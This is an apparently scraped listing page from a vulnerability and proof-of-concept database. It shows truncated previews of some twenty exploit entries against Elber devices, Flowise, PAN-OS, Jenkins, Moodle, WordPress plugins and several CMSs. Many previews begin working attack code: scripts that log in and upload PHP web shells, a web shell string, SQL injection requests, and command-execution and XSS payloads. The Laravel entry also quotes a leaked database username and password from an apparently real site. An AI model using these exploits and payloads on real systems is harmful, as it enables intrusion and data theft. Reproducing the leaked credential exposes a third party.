?day POC 漏洞数据库

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.0.0 Revision 7304 1.0.0 Revision 7284 1.0.0 Revision 6505 1.0.0 Revision 6332 1.0.0 Revision 6258 XS2DAB v1.50 rev 6267 Summary: Cleber offers a powerful, flexible and modular hardware and software platform for broadcasting and contribution networks where customers can install up to six boards with no limitations in terms of position or number. Based on a Linux embedded OS, it detects the presence of the boards and shows the related co…

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.0.0 Revision 7304 1.0.0 Revision 7284 1.0.0 Revision 6505 1.0.0 Revision 6332 1.0.0 Revision 6258 XS2DAB v1.50 rev 6267 Summary: Cleber offers a powerful, flexible and modular hardware and software platform for broadcasting and contribution networks where customers can install up to six boards with no limitations in terms of position or number. Based on a Linux embedded OS, it detects the presence of the boards and shows the re…

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.999 Revision 1243 1.317 Revision 602 1.220 Revision 1250 1.220 Revision 1248_1249 1.220 Revision 597 1.217 Revision 1242 1.214 Revision 1023 1.193 Revision 924 1.175 Revision 873 1.166 Revision 550 Summary: The SIGNUM controller from Elber satellite equipment demodulates one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving 256 KS/s as minimum sym…

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.999 Revision 1243 1.317 Revision 602 1.220 Revision 1250 1.220 Revision 1248_1249 1.220 Revision 597 1.217 Revision 1242 1.214 Revision 1023 1.193 Revision 924 1.175 Revision 873 1.166 Revision 550 Summary: The SIGNUM controller from Elber satellite equipment demodulates one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving 256 KS/s as min…

# Exploit Title: Flowise 1.6.5 - Authentication Bypass # Date: 17-April-2024 # Exploit Author: Maerifat Majeed # Vendor Homepage: https://flowiseai.com/ # Software Link: https://github.com/FlowiseAI/Flowise/releases # Version: 1.6.5 # Tested on: mac-os # CVE : CVE-2024-31621 The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability. The code snippet this.app.use((req, res, next) => { > if (req.url.includes('/api/v1/')) { > whitelistURLs.some((url) => req.url.includes(url)) ? > next() : basicAuthMiddleware(req, res, next) > } else next() > }) puts authenticat…

# Exploit Title: Laravel Framework 11 - Credential Leakage # Google Dork: N/A # Date: [2024-04-19] # Exploit Author: Huseein Amer # Vendor Homepage: [https://laravel.com/] # Software Link: N/A # Version: 8.* - 11.* (REQUIRED) # Tested on: [N/A] # CVE : CVE-2024-29291 Proof of concept: Go to any Laravel-based website and navigate to storage/logs/laravel.log. Open the file and search for "PDO->__construct('mysql:host=". The result: shell Copy code #0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) #1 …

# Exploit Title: SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 18.04.2024 # Vendor Homepage: https://www.sofawiki.com # Software Link: https://www.sofawiki.com/site/files/snapshot.zip # Tested Version: v3.9.2 (latest) # Tested on: MacOS import requests import random import sys import time def main(): if len(sys.argv) < 4: print("Usage: python exploit.py <base_url> <username> <password>") sys.exit(1) base_url, username, password = sys.argv[1:4] filename = f"{random.randint(10000, 99999)}.phtml" session = requests.Session() login_url = f"{base_url}/index.php" login_data = …

# Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution # Date: 2024-04-16 # Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Vendor Homepage: https://wordpress.org # Software Link: https://wordpress.org/plugins/background-image-cropper/ # Version: 1.2 # Category : webapps # Tested on: windows 10 , firefox import sys , requests, re from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multip…

# Exploit Title: FlatPress v1.3 - Remote Command Execution # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 19.04.2024 # Vendor Homepage: https://www.flatpress.org # Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip # Tested Version: 1.3 (latest) # Tested on: MacOS import requests import time import random import string def random_string(length=5): """Rastgele bir string oluşturur.""" letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(length)) def login_and_upload(base_url, username, password): filename = random_string() + ".php" login_url = f"http://{base_url}/login.php" upload_url…

# Exploit Title: Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation # Date: 21 Apr 2024 # Exploit Author: Kr0ff # Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400 # Software Link: - # Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3 # PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1 # PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1 # Tested on: Debian # CVE : CVE-2024-3400 #!/usr/bin/env python3 import sys try: …

# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated) # Date: 2023-08-14 # Exploit Author: V. B. # Vendor Homepage: https://sourceforge.net/projects/open-clinic/ # Software Link: https://sourceforge.net/projects/open-clinic/ # Version: OpenClinic GA 5.247.01 # Tested on: Windows 10, Windows 11 # CVE: CVE-2023-40279 # Details An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories. # Proof of Concept (POC) Steps to Reproduce: - Crafting the Mali…

# Exploit Title: Jenkins 2.441 - Local File Inclusion # Date: 14/04/2024 # Exploit Author: Matisse Beckandt (Backendt) # Vendor Homepage: https://www.jenkins.io/ # Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip # Version: 2.441 # Tested on: Debian 12 (Bookworm) # CVE: CVE-2024-23897 from argparse import ArgumentParser from requests import Session, post, exceptions from threading import Thread from uuid import uuid4 from time import sleep from re import findall class Exploit(Thread): def __init__(self, url: str, identifier: str): Thread.__init__(self) self.daemon = True self.url = url self.params = {"remoting": "…

# Exploit Title: OpenClinic GA 5.247.01 - Information Disclosure # Date: 2023-08-14 # Exploit Author: VB # Vendor Homepage: https://sourceforge.net/projects/open-clinic/ # Software Link: https://sourceforge.net/projects/open-clinic/ # Version: OpenClinic GA 5.247.01 # Tested on: Windows 10, Windows 11 # CVE: CVE-2023-40278 # Details An Information Disclosure vulnerability was discovered in the printAppointmentPdf.jsp component of OpenClinic GA 5.247.01. The issue arises due to improper handling of error messages in response to manipulated input, allowing an attacker to deduce the existence of specific appointments. # Proof of Concept (POC) Steps to Reproduce: - Access …

# Exploit Title: djangorestframework-simplejwt 5.3.1 - Information Disclosure # Date: 26/01/2024 # Exploit Author: Dhrumil Mistry (dmdhrumilmistry) # Vendor Homepage: https://github.com/jazzband/djangorestframework-simplejwt/ # Software Link:https://github.com/jazzband/djangorestframework-simplejwt/releases/tag/v5.3.1 # Version: <= 5.3.1 # Tested on: MacOS # CVE : CVE-2024-22513 # The version of djangorestframework-simplejwt up to 5.3.1 is vulnerable. # This vulnerability has the potential to cause various security issues, # including Business Object Level Authorization (BOLA), Business Function # Level Authorization (BFLA), Information Disclosure, etc. The vulnerabil…

#!/usr/bin/env python3 # Exploit Title: Pre-auth RCE on Compuware iStrobe Web # Date: 01-08-2023 # Exploit Author: trancap # Vendor Homepage: https://www.bmc.com/ # Version: BMC Compuware iStrobe Web - 20.13 # Tested on: zOS# CVE : CVE-2023-40304 # To exploit this vulnerability you'll need "Guest access" enabled. The vulnerability is quite simple and impacts a web upload form, allowing a path traversal and an arbitrary file upload (.jsp files) # The vulnerable parameter of the form is "fileName". Using the form, one can upload a webshell (content of the webshell in the "topicText" parameter).# I contacted the vendor but he didn't consider this a vulnerability because of …

# Exploit Title: Online Fire Reporting System SQL Injection Authentication Bypass # Date: 02/10/2024 # Exploit Author: Diyar Saadi # Vendor Homepage: https://phpgurukul.com/online-fire-reporting-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/projects/Online-Fire-Reporting-System-using-PHP.zip # Version: V 1.2 # Tested on: Windows 11 + XAMPP 8.0.30 ## Exploit Description ## SQL Injection Vulnerability in ofrs/admin/index.php : The SQL injection vulnerability in the ofrs/admin/index.php script arises from insecure handling of user input during the login process. ## Steps to reproduce ## 1- Open the admin panel page by following URL : http://localhos…

# Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection # Date: February 6, 2024 # Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group # Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip # Tested on: Linux and Windows, XAMPP # CVE-2023-51951 # Vendor: oretnom23 # Version: v1.0 # Exploit Description: # The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the…

# Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site Scripting # Date: 2024-01-03 # Exploit Author: Eren Sen # Vendor: SAVSOFT QUIZ # Vendor Homepage: https://savsoftquiz.com # Software Link: https://savsoftquiz.com/web/index.php/online-demo/ # Version: < 6.0 # CVE-ID: N/A # Tested on: Kali Linux / Windows 10 # Vulnerabilities Discovered Date : 2024/01/03 # Persistent Cross Site Scripting (XSS) Vulnerability # Vulnerable Parameter Type: POST # Vulnerable Parameter: quiz_name # Proof of Concepts: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13 # HTTP Request: POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/…

# Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution # Date: 30/11/2023 # Exploit Author: tmrswrr # Vendor Homepage: https://wbce-cms.org/ # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip # Version: 1.6.1 # Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS ## POC: 1 ) Login with admin cred and click Add-ons 2 ) Click on Language > Install Language > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php 3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php 4 ) You will be see id command …

# Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS) # Date: 12 April 2024 # Exploit Author: Erdemstar # Vendor: https://wordpress.com/ # Version: 1.1.1 # Proof Of Concept: 1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]". # PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w # Vulnerable Property at Request: videoFields[post_type] # Payload: <script>alert(document.cookie)</script> # Request: POST /wp-admin/options.php HTTP/2 Host: erdemstar.local Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a23…

# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0 # Date: 15.11.2023 # Exploit Author: young pope # Vendor Homepage: https://github.com/WBCE/WBCE_CMS # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip # Version: 1.6.0 # Tested on: Kali linux # CVE : CVE-2023-39796 There is an sql injection vulnerability in *miniform* module which is a default module installed in the *WBCE* cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file /modules/miniform/ajax_delete_message.php there is no authentication check. On line |40| in this file, there is a |DELETE| query that is vulnerable, an…

# Exploit Title: PrusaSlicer 2.6.1 - Arbitrary code execution on g-code export # Date: 16/01/2024 # Exploit Author: Kamil Breński # Vendor Homepage: https://www.prusa3d.com # Software Link: https://github.com/prusa3d/PrusaSlicer # Version: PrusaSlicer up to and including version 2.6.1 # Tested on: Windows and Linux # CVE: CVE-2023-47268 ========================================================================================== 1.) 3mf Metadata extension ========================================================================================== PrusaSlicer 3mf project (zip) archives contain the 'Metadata/Slic3r_PE.config' file which describe various project settings, this …

# Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter # Google Dork: # Date: 04/11/2023 # Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx) # Vendor Homepage: https://moodle.org/ # Software Link: # Version: 3.10.1 # Tested on: Linux # CVE : CVE-2021-36393 import requests import string from termcolor import colored # Request details URL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification" HEADERS = { "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest", …

# Exploit Title: PopojiCMS Version : 2.0.1 Remote Command Execution # Date: 27/11/2023 # Exploit Author: tmrswrr # Vendor Homepage: https://www.popojicms.org/ # Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip # Version: Version : 2.0.1 # Tested on: https://www.softaculous.com/apps/cms/PopojiCMS ##POC: 1 ) Login with admin cred and click settings 2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?> 3 ) Open main page , you will be see id command result POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1 Host: demos5.softaculous.com Cookie: _ga_YYDPZ3NXQQ=GS1.…

# Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS) # Date: 22 March 2024 # Exploit Author: Erdemstar # Vendor: https://wordpress.com/ # Version: 1.32 # Proof Of Concept: 1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID". # PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns # Vulnerable Properties name: name, playlist_id # Payload: "><script>alert(document.cookie)</script> # Request: POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2 Host: erdemstar.local Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e9…